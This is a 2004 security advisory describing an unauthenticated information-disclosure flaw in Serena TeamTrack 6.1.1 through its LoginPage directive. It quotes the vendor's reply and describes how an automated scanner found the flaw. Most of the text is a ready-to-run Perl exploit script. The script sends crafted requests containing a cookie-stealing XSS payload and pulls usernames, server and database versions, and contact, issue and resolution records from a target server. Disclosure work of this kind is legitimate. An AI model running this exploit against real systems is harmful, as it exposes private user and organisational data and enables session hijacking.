serenaTeam.txt

`*Serena Software's TeamTrack Sensitive Content Disclosure  
  
*  
*Summary*  
"Serena <http://www.serena.com/home.asp> TeamTrack is a Web-architected,  
secure and highly configurable enterprise process management solution".  
We have discovered a security flaw with which a remote attacker can  
disclosure sensitive information off a TeamTrack server without needing  
to have a valid username/password combination.  
  
*Details*  
*Vulnerable Systems:*  
* Serena Software's TeamTrack version 6.1.1  
  
*Vendor response:*  
The last we heard from them was on 8 May 2004 stating:  
/Thank you for bringing this issue to our attention. We are currently  
evaluating the issue and will address it as soon as commercially  
possible. I am sure that you will agree that while Serena is evaluating  
this issue and preparing any required fixes, it would be best to keep  
this information confidential to ensure that Serena's customers are  
protected./  
  
The vulnerability involves accessing any HTML (dynamically generated)  
file under the TeamTrack server by requesting it through the LoginPage  
directive. As the LoginPage directive does not require a user to be  
logged on, while still processing the data keywords found in the HTML  
file, an attacker can access sensitive information by accessing key HTML  
files.  
  
The vulnerability caused by this are:  
1) Cross Site Scripting (in the case where Cookies are used as the means  
of authentication, a Cookie stolen could be used to hijack the existing  
session, NOTE: a third-party user would be required to open a specially  
crafted URL being sent to him, for this to happen)  
2) User enumeration  
3) System Information Disclosure (Product version, Web Server version,  
Web Server OS, DB Name/Type/Version)  
4) Contact information (from the Contacts table)  
5) Issue information (from the Issues table)  
6) Resolution information (from the Resolution table)  
  
*Testing Methodology:*  
A few months ago Beyond Security built a new module for its Automated  
Scanning Vulnerability Assessment engine to test web sites and web  
applications for security vulnerabilities. This module adds the  
capability to dynamically crawl through a web site and find  
vulnerabilities in its dynamic pages.  
  
This type of tool was considered to be different from the network VA  
tools, but we at Beyond Security believe that these two types of tools  
should be merged into one, and this is what made us incorporate the Web  
Site Security Audit module to our Automated Scanning engine.  
  
For a press release on this integration see:  
http://www.beyondsecurity.com/press/2004/press10030402.htm  
White paper on the first integrated network and web application  
vulnerability scanner: http://www.beyondsecurity.com/webscan-wp.pdf  
  
Our Automated Scanning engine equipped with the Web Site Security Audit  
module did all the tests described in this advisory automatically.  
  
*Exploit (for all of the above issues):*  
#!/usr/bin/perl  
  
use IO::Socket;  
  
if (($#ARGV+1) < 3)  
{  
print "Serena_hack.pl option host path  
\t1 - Cross Site Scripting issue  
\t2 - Enumerate users (First name)  
\t3 - System information disclosure  
\t4 - Contact name (default is Record ID 1)  
\t5 - Name of Issue (default is Record ID 1)  
\t6 - Name of Resolution (default is Record ID 1)  
";  
exit(0);  
}  
  
$option = $ARGV[0];  
$host = $ARGV[1];  
$path = $ARGV[2];  
  
if ($option > 6)  
{  
print "No such option\n";  
exit(0);  
}  
  
$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,  
PeerPort => "80" );  
  
unless ($remote) { die "cannot connect to http daemon on $host" }  
  
print "connected\n";  
  
$remote->autoflush(1);  
  
my $http;  
  
if ($option == 1)  
{  
$http = "GET  
/$path/tmtrack.dll?LoginPage&Template=loginform&Message=<script>alert(document.cookie)</script>  
HTTP/1.0  
  
";  
# Cookie/Cross Site Scripting  
}  
  
if ($option == 2)  
{ # Enumerate users  
$http = "GET /$path/tmtrack.dll?LoginPage&Template=user HTTP/1.0  
  
";  
};  
  
if ($option == 3)  
{ # Information disclosure  
$http = "GET /$path/tmtrack.dll?LoginPage&Template=about HTTP/1.0  
  
";  
}  
  
if ($option == 4)  
{ # Fullname for a certain ID  
$RecordID = 1;  
$http = "GET  
/$path/tmtrack.dll?LoginPage&Template=viewbody&recordid=$RecordID&tableid=38  
HTTP/1.0  
  
";  
}  
  
if ($option == 5)  
{ # Issue name  
$RecordID = 1;  
$http = "GET  
/$path/tmtrack.dll?LoginPage&Template=viewbody&recordid=$RecordID&tableid=41  
HTTP/1.0  
  
";  
}  
  
if ($option == 6)  
{ # Resolution name  
$RecordID = 1;  
$http = "GET  
/$path/tmtrack.dll?LoginPage&Template=viewbody&recordid=$RecordID&tableid=42  
HTTP/1.0  
  
";  
}  
  
print "HTTP: [$http]\n";  
print $remote $http;  
sleep(1);  
print "Sent\n";  
  
my $display = 1;  
  
if ($option == 2)  
{ # Enumerate names  
$display = 0;  
# No need to display the complete HTML  
}  
  
if ($option == 3)  
{ # System information disclosure  
$display = 0;  
}  
  
if ($option == 4 || $option == 5 || $option == 6)  
{  
$display = 0;  
}  
  
while (<$remote>)  
{  
if ($option == 2) # Enumerate names  
{  
if (/<OPTION VALUE=([^>]+)>([^<]+)<\/OPTION>/)  
{  
print "ID: $1, Name: $2\n";  
}  
}  
  
if ($option == 3)  
{  
if (/<input type="hidden" name="Product_Version.*" value="[ ]+([^"]+)"/)  
{  
print "Product version: $1\n";  
}  
if (/<input type="hidden" name="WebServer.*" value="[ ]+([^"]+)"/)  
{  
print "Web Server version: $1\n";  
}  
if (/<input type="hidden" name="WebServer_OS.*" value="[ ]+([^"]+)"/)  
{  
print "Server version: $1\n";  
}  
if (/<input type="hidden" name="DBMS.*" value="[ ]+([^"]+)"/)  
{  
print "Database version: $1\n";  
}  
}  
  
if ($option == 4)  
{  
if (/Contact Details<\/span> - ([^<]+)</g)  
{  
print "Full name: $1\n";  
}  
}  
  
if ($option == 5)  
{  
if (/Problem Details<\/span> - ([^<]+)/g)  
{  
print "Issue name: $1\n";  
}  
}  
  
if ($option == 6)  
{  
if (/Resolution Details<\/span> - ([^<]+)/g)  
{  
print "Resolution name: $1\n";  
}  
}  
  
if ($display)  
{  
print $_;  
}  
}  
print "\n";  
  
close $remote;  
  
*Additional information*  
The information has been provided by Noam Rathaus   
  
  
Copyright © 1998-2004 Beyond Security Ltd.  
`